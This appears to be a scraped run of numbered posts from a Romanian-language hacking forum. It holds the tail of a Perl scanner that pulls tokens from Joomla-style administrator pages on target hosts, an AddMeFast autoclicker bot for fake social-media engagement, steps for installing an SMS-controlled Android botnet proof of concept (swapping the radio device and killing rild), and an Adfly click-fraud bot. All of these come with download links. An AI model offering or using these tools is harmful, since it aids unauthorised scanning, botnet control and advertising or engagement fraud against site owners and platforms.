$gjotoken->get("http://".$_[0]."/administrator/index.php"); if($gjotoken->content() =~ /([0-9a-fA-F]{32})/){ print " + found token \n"; chomp($1); return $1; } else { print " - can't get token \n"; next; } } sub savefile { open (save,">>".$_[0]); print save $_[1]."\n"; close save; } sub uniq { return keys %{{ map { $_ => 1 } @_ }}; } sub head { print qq { [+] scanner [+] (c) Humax } } https://www.sendspace.com/file/1xlza6
  18. AddMeFast Bot – AddMeFast Autoclicker for Unlimited Points Automated Solution to boost your social media presence using AddMeFast What is AddMeFast? AddMeFast is the #1 tool to boost your social media presence. With AddMeFast you could get REAL twitter followers, REAL facebook likes, REAL youtube subscribers and REAL website hits from REAL people. Choose who to follow, like, subscribe and visit for targeted traffic to your social network! If you don”t have AddMeFast account then you should grab it right away. Register at http://addmefast.com Spending money to purchase points or earning these manually is a real pain! Stop Never buy AddMeFast points again! Download: http://www.ziddu.com/download/22532822/1.03.7.rar.html http://www59.zippyshare.com/v/44872322/file.html
  19. To avoid detection, this proof-of-concept code utilizes the Short Messaging Service (SMS) as a command & control channel. This adds fault tolerance because, if a smartphone is not available on the GSM network due to being powered off or out of service range, when an SMS message arrives for delivery, the message is queued and delivered by the network. Download the POC code from Here. Compiling instructions are simple and straight forward. Please follow these: Compile with arm-gcc with the -static flag set Copy to anywhere on the underlying OS that is writable (/data/ is good). Rename /dev/smd0/ to /dev/smd0real/ Start the bot application Kill the radio application (ps | grep rild) The radio will automatically respawn and now the bot proxy will be working The PoC code for smartphone botnet C&C over SMS was presented at the Shmooconheld in January 2011. It seems that the author also has it working for the iPhone platform! For sanity purposes, the PoC code has payloads aka commands removed. So what you see in the demo video will need to be added manually. It however does include logging and a local open port for testing to make developing your own payloads easier! Demo video here Sursa: SomeKnowledge.tk
  20. Download Adfly_v152.exe Atentie url-ul este doar scurtat. Acest bot va ajuta sa faceti ceva banisori incat sa platiti un host,poate un domeniu. Aveti in el o lista cu proxy-uri actualizati-o voii introduceti in acele casute linkuri prescurtare de la adfl.ly acolo la optiuni la reffer puneti siteurile care le-ati scurtat cum am spus cu o lista de proxy-uri fresh aveti ocazia de a face ceva $ intradevar nu se vor contoriza toate click-urile dar mai bine de jumate se vor contoriza o sa va prindeti voi repede. Atentie e acelasi program care a fost postat de spide112? doar ca este cea mai noua verisune cred a acestui bot si din fericire acesta este curat astept pareri pro si contra.
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